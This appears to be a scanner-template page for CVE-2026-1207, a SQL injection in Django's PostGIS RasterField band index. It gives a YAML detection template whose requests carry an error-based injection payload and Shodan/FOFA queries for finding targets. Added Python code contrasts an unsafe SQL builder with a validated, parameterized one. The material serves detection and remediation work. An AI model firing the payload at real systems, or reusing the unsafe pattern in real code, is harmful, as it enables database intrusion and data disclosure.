
Django RasterField - SQL Injection

CVE-2026-1207
Verified

Description

Django before 6.0.2, 5.2.11 and 4.2.28 contains a SQL injection caused by improper sanitization of the band index parameter in RasterField lookups on PostGIS. A remote attacker can inject SQL by supplying a crafted band index value to an application that passes that input into a raster lookup.

Severity

High

CVSS Score

8.1

Exploit Probability

5%

Affected Product

django

Published Date

February 5, 2026

Template Author

omarkurt

CVE-2026-1207.yaml
id: CVE-2026-1207

info:
  name: Django RasterField - SQL Injection
  author: omarkurt
  severity: high
  description: |
    Django before 6.0.2, 5.2.11 and 4.2.28 contains a SQL injection caused by improper sanitization of the band index parameter in RasterField lookups on PostGIS. A remote attacker can inject SQL by supplying a crafted band index value to an application that passes that input into a raster lookup.
  impact: |
    Remote attackers can execute arbitrary SQL commands, potentially leading to data disclosure or modification.
  remediation: |
    Upgrade to versions 6.0.2, 5.2.11, 4.2.28 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1207
    - https://www.djangoproject.com/weblog/2026/feb/03/security-releases/
    - https://github.com/django/django/commit/81aa5292967cd09319c45fe2c1a525ce7b6684d8
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
    cvss-score: 8.1
    cve-id: CVE-2026-1207
    epss-score: 0.05295
    epss-percentile: 0.90113
    cwe-id: CWE-89
    cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: djangoproject
    product: django
    shodan-query: 'django'
    fofa-query: 'app="Django"'
  tags: cve,cve2026,django,sqli,postgis,rasterfield,vuln,unauth,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--"
      - "{{BaseURL}}/api/raster/search/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains_all(body, "invalid input syntax for type integer", "PostgreSQL")'
        condition: and

    extractors:
      - type: regex
        name: postgres_version
        part: body
        group: 1
        regex:
          - 'PostgreSQL ([0-9]+\.[0-9]+)'
# digest: 4a0a004730450220641afb2f278dd1a24e92827255644ece69367cb97160b5dac4f638a9d6a54aca022100f9c99bb1e153d4230130544ebeb8f9e38f6ba5ee8a801df7ff814efa7e791e7d:922c64590222798bb761d5b6d8e72950
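The template above is error-based: the payload closes the band argument, then forces PostgreSQL to cast the output of version() to an integer, so the resulting DataError message contains the version string and the matcher keys on it. Two things a practitioner should keep in mind: the database error text only reaches the HTTP response when the application exposes it (for example a Django DEBUG=True error page), so a miss is not evidence that the target is patched; and the underlying bug class is an integer parameter reaching the SQL string unvalidated. The following example is added to this page and is not Django's code, the fix commit, or the template author's work. The function names, the ST_Band SQL shape, the psycopg-style %s placeholder and the sample response bodies are assumptions chosen to illustrate the vulnerable pattern, its hardened form, and the template's matcher and extractor logic run over constructed responses:

```python
import re

# Constructed payload with the same shape as the template's URL-decoded band
# parameter; used here only as test input.
PAYLOAD = "1) AND 1=CAST((SELECT version()) AS INT)--"


def build_band_sql_unsafe(column, band):
    """Vulnerable pattern (hypothetical, not Django's code): the band index is
    pasted into the SQL text, so PAYLOAD closes the argument list and appends
    its own predicate."""
    return "ST_Band(%s, %s)" % (column, band)


def validate_band_index(band):
    """Accept only a 1-based integer band index; reject everything else.

    Strings are accepted only when they are pure digits, so parentheses,
    spaces or a sub-select never reach the SQL string.
    """
    if isinstance(band, bool):
        raise ValueError("band index must be an integer, got bool")
    if isinstance(band, str):
        if not re.fullmatch(r"[0-9]+", band):
            raise ValueError("band index must be an integer, got %r" % band)
        band = int(band)
    elif not isinstance(band, int):
        raise ValueError("band index must be an integer, got %r" % band)
    if band < 1:
        raise ValueError("band index must be >= 1")
    return band


def build_band_sql_safe(column, band):
    """Hardened pattern: validate first, then bind the index as a query
    parameter (psycopg-style %s placeholder) instead of interpolating it."""
    return "ST_Band(%s, %%s)" % column, [validate_band_index(band)]


def rejects_band(band):
    """True when validate_band_index refuses the value."""
    try:
        validate_band_index(band)
    except ValueError:
        return True
    return False


def matches_template(status_code, body):
    """Same condition as the template's DSL matcher: a 500 whose body carries
    PostgreSQL's integer-cast error wrapped around the version() string."""
    return (
        status_code == 500
        and "invalid input syntax for type integer" in body
        and "PostgreSQL" in body
    )


def extract_postgres_version(body):
    """Same regex as the template's extractor; returns e.g. '15.4' or None."""
    m = re.search(r"PostgreSQL ([0-9]+\.[0-9]+)", body)
    return m.group(1) if m else None


# Constructed sample of what a debug error page might contain when the CAST
# in the payload fails. It is not a captured response.
SAMPLE_DEBUG_BODY = (
    "DataError at /api/raster/search/\n"
    'invalid input syntax for type integer: "PostgreSQL 15.4 on x86_64-pc-linux-gnu"\n'
)

# Constructed production-style 500 page: no database error text, so the
# template cannot confirm the bug even when it is present.
SAMPLE_PROD_BODY = "<h1>Server Error (500)</h1>"


if __name__ == "__main__":
    print(build_band_sql_unsafe("rast", PAYLOAD))
    print("payload rejected:", rejects_band(PAYLOAD))
    print(build_band_sql_safe("rast", "2"))
    print(matches_template(500, SAMPLE_DEBUG_BODY), extract_postgres_version(SAMPLE_DEBUG_BODY))
    print(matches_template(500, SAMPLE_PROD_BODY))
```

Running the block prints the injected SQL that the unsafe builder produces, shows the validator refusing the payload while accepting "2", and shows that the matcher fires only on the debug-style body, which is why a negative scan result should be read as "not confirmed" rather than "not vulnerable".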
CVSS Metrics

Score: 8.1
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
CVE ID: CVE-2026-1207
CWE ID: CWE-89

References

https://nvd.nist.gov/vuln/detail/CVE-2026-1207
https://www.djangoproject.com/weblog/2026/feb/03/security-releases/
https://github.com/django/django/commit/81aa5292967cd09319c45fe2c1a525ce7b6684d8

Remediation Steps

Upgrade to versions 6.0.2, 5.2.11, 4.2.28 or later.